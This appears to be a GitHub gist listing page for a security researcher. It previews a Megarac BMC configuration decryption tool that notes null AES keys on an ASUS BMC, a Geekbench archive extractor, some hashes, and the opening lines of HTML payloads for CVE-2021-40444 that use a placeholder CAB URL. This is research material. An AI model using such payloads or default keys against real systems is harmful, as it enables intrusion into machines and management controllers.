Skip to content

Instantly share code, notes, and snippets.

View D4stiny's full-sized avatar
🏠
Working from home

Bill Demirkapi D4stiny

🏠
Working from home
View GitHub Profile
@D4stiny
D4stiny / bmc_cfg_tool.py
Created June 12, 2025 02:59
Tool to decrypt and encrypt Megarac-based configuration backups.
"""
COPYRIGHT Bill Demirkapi 2025
Small utility I wrote with some help from Gemini Pro 2.5 to decrypt/encrypt BMC config backups from my ASUS ASMB11-iKVM AST2600 BMC.
Fed the model a bunch of decompiled code from BMC firmware libaries like libaes and libBackupConf.
Probably works with other Megarac-based BMCs too.
Expects an AESKey and AESIV file in script directory. This varies by OEM, often requires unpacking firmware/flash image.
For my ASUS BMC, however, the Key/IV for config are just NULL keys. AESKey file content is "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=", AESIV's is "AAAAAAAAAAAAAAAAAAAAAA==".
"""
@D4stiny
D4stiny / gist:328afbad165adb760472d3fbacd2e9fc
Created June 8, 2025 05:24
geekbench plar archive extraction tool (ai generated based on decompiled code)
#!/usr/bin/env python3
"""
plar_extract.pyExtract files from Geekbench *.plar* archives (Geekbench 6+)
==========================================================================
** Based on this 4 year old script: https://gist.github.com/HarukaMa/0772fc47311f6bbcb79ce3f84a7134d7
Usage
-----
python plar_extract.py <archive.plar> [output_dir]
5ed0490eab435cd36c9d78a37dade38fe22862ad537aea1ffe66913d96058965
513fd6c864717f1abd78e72704597c730280d55c312423c5661ca544a41643eb
2c4785278cc50d8b683a5d2e28ebdf29c386bbbda284fc162917fb6688031341
f5229314179a5ff063b5ae32c9bd6bc14e831cc68089b2991ced784981483ac2
@D4stiny
D4stiny / gist:0b5796b9d85381284fa8793ebf2ea68b
Created June 1, 2023 14:57
Don't you love hashes? I do!
38fda53c4d91a2279a300e030f87bd9783d3640ba090bc3a74d049c2e3c5ae2b
@D4stiny
D4stiny / Hash
Created December 2, 2022 16:54
Another hash for my collection.
e5285d895cc1200237f9676985df471f4eba9d13f59541b8df774238a188382bc2c7ce6a75d7346f5b0fe940e2ca196b78edde78912e5bd3a4f0e88e8906c7c1
@D4stiny
D4stiny / cve202140444_ie.html
Created January 7, 2022 09:16
CVE-2021-40444 payload ported for Internet Explorer
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
<script>
var exploit_cab = "[CAB file URL]";
@D4stiny
D4stiny / cve202140444_deobfuscated.html
Created January 7, 2022 09:13
Deobfuscated HTML payload used in CVE-2021-40444 payload
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
<script>
var exploit_cab = "[CAB file URL]";
@D4stiny
D4stiny / Hash
Created January 7, 2022 03:01
Hash
DDF218CF99DBF0F21A0C5480331BA07DF4FDB1A6E44E9622B30F0A5B650B9F0E

Keybase proof

I hereby claim:

To claim this, I am signing this object: